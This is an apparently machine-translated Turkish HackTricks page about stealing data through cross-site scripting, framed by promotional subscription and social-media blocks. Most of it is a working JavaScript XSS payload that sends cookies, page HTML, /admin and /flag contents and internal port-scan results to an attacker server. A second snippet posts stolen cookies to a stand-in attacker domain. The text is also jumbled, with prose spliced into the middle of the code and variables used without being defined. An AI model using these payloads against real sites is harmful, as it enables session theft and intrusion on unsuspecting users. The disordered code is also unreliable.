7.8 KiB
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
var EXFIL_BY_LOC = false var ALL_INFO = "" // Only used by Location exfiltration
// Function to make the data possible to transmit via either GET or POST function encode(text){ return encodeURI(btoa(text)); }
// Functions to exfiltrate the information function exfil_info(info_name, text, is_final=false){ if (EXFIL_BY_IMG) exfil_by_img(info_name, text); if (EXFIL_BY_RQ_GET) exfil_by_rq_get(info_name, text); if (EXFIL_BY_RQ_POST) exfil_by_rq_post(info_name, text); if (EXFIL_BY_FETCH_GET) exfil_by_fetch_get(info_name, text); if (EXFIL_BY_FETCH_POST) exfil_by_fetch_post(info_name, text); if (EXFIL_BY_NAV) exfil_by_nav(info_name, text); if (EXFIL_BY_LOC){ if (is_final) exfil_by_loc(info_name, text); else ALL_INFO += "\n\n" + info_name + "=" + text; } }
function exfil_by_img(info_name, text){ new Image().src = ATTACKER_SERVER + "/exfil_by_img/" + info_name + "?" + info_name + "=" + text }
function exfil_by_rq_get(info_name, text){ var xhttp = new XMLHttpRequest(); xhttp.open("GET", ATTACKER_SERVER + "/exfil_by_rq_get/" + info_name + "?" + info_name + "=" + text, true); xhttp.send(); }
function exfil_by_rq_post(info_name, text){ var xhttp = new XMLHttpRequest(); xhttp.open("POST", ATTACKER_SERVER + "/exfil_by_rq_post/" + info_name, true); xhttp.send(text); }
function exfil_by_fetch_get(info_name, text){ fetch(ATTACKER_SERVER + "/exfil_by_fetch_get/" + info_name + "?" + info_name + "=" + text, {method: 'GET', mode: 'no-cors'}); }
function exfil_by_fetch_post(info_name, text){ fetch(ATTACKER_SERVER + "/exfil_by_fetch_post/" + info_name, {method: 'POST', mode: 'no-cors', body: text}); }
function exfil_by_nav(info_name, text){ navigator.sendBeacon(ATTACKER_SERVER + "/exfil_by_nav/" + info_name, text) }
function exfil_by_loc(info_name, text){ document.location = ATTACKER_SERVER + "/exfil_by_loc/?a=" + encode(ALL_INFO); }
// Functions to get the data to exfiltrate function exfil_page_content(url){ var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { exfil_info(url, encode(xhr.responseText)); } } xhr.open('GET', url, true); xhr.send(null); }
function exfil_internal_port(port){ fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors" }).then(() => { exfil_info("internal_port", encode(port)); }); }
// Info to exfiltrate exfil_info("cookies", encode(document.cookie)); exfil_info("current_url", encode(document.URL)); exfil_info("current_content", encode(document.documentElement.innerHTML)); exfil_page_content("/"); exfil_page_content("/admin"); // If 404 nothing will be sent exfil_page_content("/flag"); exfil_page_content("/flag.txt");
# XSS (Cross Site Scripting) ile Bilgi Çalma
XSS, bir saldırganın hedef web uygulamasına zararlı bir kod enjekte etmesini sağlayan bir saldırı türüdür. Bu saldırı türü, kullanıcıların güvenli olmayan giriş alanlarına (örneğin, arama kutuları, yorum alanları) zararlı kodları ekleyerek gerçekleştirilir. Bu kodlar, kullanıcıların tarayıcılarında çalıştırılır ve saldırganın istediği bilgileri çalmak veya kullanıcıları başka zararlı eylemlere yönlendirmek için kullanılabilir.
## JavaScript ile Bilgi Çalma
XSS saldırıları sırasında en yaygın kullanılan yöntemlerden biri, JavaScript kodunu kullanarak hedef kullanıcının tarayıcısından bilgi çalmaktır. Aşağıdaki JavaScript kodu, tarayıcıda çalıştırıldığında kullanıcının tarayıcısından çeşitli bilgileri çalar:
```html
<script>
var stolenInfo = {
cookies: document.cookie,
userAgent: navigator.userAgent,
location: window.location.href,
screenResolution: window.screen.width + "x" + window.screen.height
};
// Çalınan bilgileri saldırganın kontrol ettiği bir sunucuya gönderme
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://saldırganın-sunucusu.com/çalınan-bilgileri-kaydet");
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(JSON.stringify(stolenInfo));
</script>
Bu kod, kullanıcının tarayıcısında çalıştırıldığında, document.cookie
ile çerezleri, navigator.userAgent
ile tarayıcı kullanıcı ajanını, window.location.href
ile mevcut sayfanın URL'sini ve window.screen.width
ve window.screen.height
ile ekran çözünürlüğünü çalar. Ardından, çalınan bilgileri saldırganın kontrol ettiği bir sunucuya gönderir.
Bu tür bir saldırıyı gerçekleştirmek için, saldırganın hedef web uygulamasında güvenli olmayan bir giriş alanı bulması ve bu alanlara zararlı JavaScript kodunu enjekte etmesi gerekir. Bu nedenle, web uygulamalarının güvenliğini sağlamak için giriş alanlarının doğru bir şekilde doğrulanması ve kullanıcı girişlerinin güvenli bir şekilde işlenmesi önemlidir.
```javascript
top_1000.forEach(port => exfil_internal_port(port));
if (EXFIL_BY_LOC){
setTimeout(exfil_info("bitir", "bitir", true), 5000) // 5 saniye sonra konuma göre bilgi sızdırma
}
// Bilgiyi dinle
window.onmessage = function(e){
exfil_info("onmessage", encode(e.data))
}
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- PEASS Ailesi'ni keşfedin, özel NFT'lerimizden oluşan koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.